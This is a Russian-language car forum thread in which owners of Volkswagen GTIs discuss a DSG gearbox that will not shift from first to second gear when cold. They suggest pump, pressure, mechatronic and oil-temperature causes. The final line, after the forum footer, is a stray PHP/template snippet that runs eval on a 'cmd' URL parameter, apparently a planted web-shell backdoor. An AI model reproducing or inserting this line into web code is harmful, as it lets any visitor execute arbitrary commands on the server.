+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 19

Тема: Проблема с ДСГ: на холодную не переключает с 1ой на 2ую


  1. #1
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846

    Проблема с ДСГ: на холодную не переключает с 1ой на 2ую

    С октября начались следующие проблемы:

    На холодную, когда начинаешь движение, коробка начинает разгоняться на 1ой передаче, потом на экранчике появляется цифра "2", обороты взлетают, а тяга пропадает.

    Машина не разгоняется, ошибок нет ни на приборе, ни, когда подключаешь Vag Com.

    Причем ощущение, то разомкнуты сцепления! Если в таком режиме ( когда горит вторая, а обороты просто меняются в зависимости от того, как жмешь газ) лепестками жать повышение передачи, то ничего не происходит.

    Понижение при этом работает! на первой едет.

    Лечу так: глушу, снова завожу немного прогреваю и все начинает работать.

    Причем о полного прогрева с первой на вторую переключается будто с паузой, хотя этот момент неточный.

    При полном прогреве, коробка работает, как часы.

    Предыстория: пробег 90 тыс, launch control ни разу не пробовал, с места с пробуксовкой НИ РАЗУ не стартовал, ни разу не дрифтил. Коробку берег, как мог.

    Недавно перепрошился на последнюю версию заводской прошивки ДСГ. думал это решило проблему, но она повторяется.

    Возможно это с этим никак не связано, но читал у народа похожие проблемы, при умирающем насосе в баке.

    Пару дней назад заезжал к Амету, снимали логи. Все в идеале, только на средних оборотах давления топлива процентов на 30% меньше запрашиваемого, при этом валит как надо.

    Амет сказал, что начинает умирать погружной насос в баке.

    Вообщем как-то так, не пойму как это игнорировать ибо ошибок вообще никаких нет :-(

    Help

  2. #2
    GTI-Racing ARTA is on a distinguished road Аватар для ARTA
    Регистрация
    11.12.2014
    Откуда
    Msk
    Машина
    MK6 GTI DSG
    Сообщений
    207
    Менял у себя мертвый насос, тачка глохла, когда бенза по бк хватало на 50км.
    Проблем как ты описываешь не было...

  3. #3
    GTI-Racing сapitaine is on a distinguished road Аватар для сapitaine
    Регистрация
    10.07.2013
    Откуда
    Москва
    Машина
    Golf R20
    Сообщений
    608
    Блин, зря не сохранил в свое время ссылку, там смысл был в какой то детальке в дсг, типа прокладки насоса в коробке(врать не буду), Пока холодная пропускала, и давление не держала. Поищи на драйве. Точно там какая то мелочь под замену.

  4. #4
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Цитата Сообщение от ARTA Посмотреть сообщение
    Менял у себя мертвый насос, тачка глохла, когда бенза по бк хватало на 50км.
    Проблем как ты описываешь не было...
    Спасибо! буду искать проблему в коробке!

    ---------- Сообщение добавлено в 12:59 ---------- Предыдущее сообщение размещено в 12:58 ----------

    Цитата Сообщение от сapitaine Посмотреть сообщение
    Блин, зря не сохранил в свое время ссылку, там смысл был в какой то детальке в дсг, типа прокладки насоса в коробке(врать не буду), Пока холодная пропускала, и давление не держала. Поищи на драйве. Точно там какая то мелочь под замену.
    Я тоже давно встречал похожую тему, сейчас буду пробовать ее найти! Спасибо!

    ---------- Сообщение добавлено в 13:03 ---------- Предыдущее сообщение размещено в 12:59 ----------

    Цитата Сообщение от сapitaine Посмотреть сообщение
    Блин, зря не сохранил в свое время ссылку, там смысл был в какой то детальке в дсг, типа прокладки насоса в коробке(врать не буду), Пока холодная пропускала, и давление не держала. Поищи на драйве. Точно там какая то мелочь под замену.
    Эта тема?

    https://www.drive2.ru/l/2199095/

    У него вроде наоборот на горячую!

  5. #5
    GTI-Racing сapitaine is on a distinguished road Аватар для сapitaine
    Регистрация
    10.07.2013
    Откуда
    Москва
    Машина
    Golf R20
    Сообщений
    608
    Да тема та, если посмотреть то у него просто другая проблема была, а закономерность одна - давление. Что мне кажется с отсутствием давления на холодную связано. Обратись к Новожилову, думаю вряд ли кто то больше него в ремонте понимает тут.

  6. #6
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Цитата Сообщение от сapitaine Посмотреть сообщение
    Да тема та, если посмотреть то у него просто другая проблема была, а закономерность одна - давление. Что мне кажется с отсутствием давления на холодную связано. Обратись к Новожилову, думаю вряд ли кто то больше него в ремонте понимает тут.
    Новожилов это Владимир?

  7. #7
    GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Регистрация
    05.09.2011
    Откуда
    Москва
    Машина
    Эгоист GTI 5
    Сообщений
    816
    у меня тоже самое иногда происходит на 1 передаче в мороз! на старом мехатронике такое было и на новом тоже самое

  8. #8
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Это на 5ом гти? Масло менял?

  9. #9
    GTI-Racing Bonder is on a distinguished road Аватар для Bonder
    Регистрация
    05.09.2011
    Откуда
    Москва
    Машина
    Эгоист GTI 5
    Сообщений
    816
    Цитата Сообщение от valj Посмотреть сообщение
    Это на 5ом гти? Масло менял?
    на 5 ГТИ 23 февраля поменял мехатрон и масло соответственно) старый мехатрон тоже рабочий был. Немного дергал. но на 1 тоже долго ехал потом подтыкал вторую) новый также иногда первую держит. Чтобы этого не было надо постоять минут 5 и дать машине поработать. Поставил Рево Фис и теперь по овету Кирилла жду когда масло до 60 прогреется

  10. #10
    GTI-Racing valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough valj is a jewel in the rough Аватар для valj
    Регистрация
    02.06.2010
    Откуда
    Москва
    Машина
    mk6 gti
    Сообщений
    1,846
    Цитата Сообщение от Bonder Посмотреть сообщение
    на 5 ГТИ 23 февраля поменял мехатрон и масло соответственно) старый мехатрон тоже рабочий был. Немного дергал. но на 1 тоже долго ехал потом подтыкал вторую) новый также иногда первую держит. Чтобы этого не было надо постоять минут 5 и дать машине поработать. Поставил Рево Фис и теперь по овету Кирилла жду когда масло до 60 прогреется
    Действительно, проблема идентична моей. Может в датчике каком-то проблема

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Гуляют обороты на холодную
    от Jahnglist3000 в разделе Golf 5
    Ответов: 30
    Последнее сообщение: 03.01.2024, 22:06
  2. Троит на холодную.
    от ecko00z в разделе Golf 5
    Ответов: 9
    Последнее сообщение: 03.01.2024, 15:28
  3. где купить холодную часть?
    от KOT в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 7
    Последнее сообщение: 02.10.2023, 14:28
  4. Шум DSG на холодную
    от Mozhai в разделе Ходовая
    Ответов: 0
    Последнее сообщение: 05.12.2013, 18:28
  5. Дым Из Турбины На Холодную
    от Eddie в разделе Ремонт и обслуживание
    Ответов: 6
    Последнее сообщение: 23.10.2008, 18:40

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}